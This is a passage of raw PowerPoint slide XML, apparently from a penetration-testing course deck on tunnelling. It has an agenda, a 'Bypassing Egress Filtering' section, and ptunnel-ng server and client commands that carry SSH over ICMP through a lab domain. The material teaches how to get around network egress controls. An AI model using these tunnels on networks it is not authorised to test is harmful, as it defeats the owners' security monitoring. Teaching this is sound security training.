          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4763597" y="2459032"/>
            <a:ext cx="3932237" cy="3811588"/>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bg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bg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bg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bg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bg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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>proxychains</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t> &lt;command&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3744845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24F6B-093B-45C4-A29F-4CF690E41963}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="466809" y="275639"/>
            <a:ext cx="3932237" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Proxifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Applications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EBB392CD-6DD8-4F12-8340-A7E110B3D1FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="331301" y="2250177"/>
            <a:ext cx="11745964" cy="3277057"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28151125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EA5C3B-28B1-4A6E-8645-2A6DBC16E349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri Light" panose="020F0302020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Agenda</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D531D001-A551-43C7-9EBE-FCAAD56550E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="2057399"/>
            <a:ext cx="10563708" cy="3952461"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Port Forwarding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Tunnelling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SSH Tunneling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Proxifying</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>ICMP Tunnelling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>DNS Tunnelling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Port Forwarding/Tunnelling in Metasploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Penetration Test Exercise</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3949234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26798C0-3120-4922-A2D8-16E731A647E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2084890"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2E75B5"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bypassing Egress Filtering</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="11500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38658890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26798C0-3120-4922-A2D8-16E731A647E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1524000" y="2235200"/>
            <a:ext cx="9144000" cy="2387600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“We only let PING out from there”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25613422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5D500-8634-4944-AB3A-890E8D34DD81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ICMP Tunnelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC1D1AEA-6A4F-4291-8686-9E3A1819E731}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="831406"/>
            <a:ext cx="7234493" cy="5195187"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAEF51C-5463-447D-A3CD-B1DF1CD9050A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ptunnel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Released from MIT on 12/7/2004</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://www.mit.edu/afs.new/sipb/user/golem/tmp/ptunnel-0.61.orig/web/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-ng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bugfixed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and refactored version of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> with some additional features</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>https://github.com/lnslbrty/ptunnel-ng</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36228616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5D500-8634-4944-AB3A-890E8D34DD81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ICMP Tunnelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAEF51C-5463-447D-A3CD-B1DF1CD9050A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="478840" y="2057400"/>
            <a:ext cx="10614275" cy="4259179"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-ng -r127.0.0.1 -R22 --m 0xD3ADB33F -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>P'bisp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE3C25F6-3186-4D4E-9CA4-08B7E1DD284B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="839788" y="3189145"/>
            <a:ext cx="10539318" cy="2140067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{880DE22E-FCF3-4CE6-AF89-12CEC33B4306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9003803" y="928623"/>
            <a:ext cx="4178623" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-r remote server address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-R remote server port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-m magic byte value</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-P password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18316511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5D500-8634-4944-AB3A-890E8D34DD81}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="683377" y="276726"/>
            <a:ext cx="3932237" cy="1600200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ICMP Tunnelling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEAEF51C-5463-447D-A3CD-B1DF1CD9050A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="334461" y="1876926"/>
            <a:ext cx="10614275" cy="4259179"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="70AD47"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t># client</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" marR="0">
              <a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ptunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-ng -ptunnel.bisplabdomain.com --m 0xD3ADB33F -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>P'bisp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' -l 2222</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{880DE22E-FCF3-4CE6-AF89-12CEC33B4306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
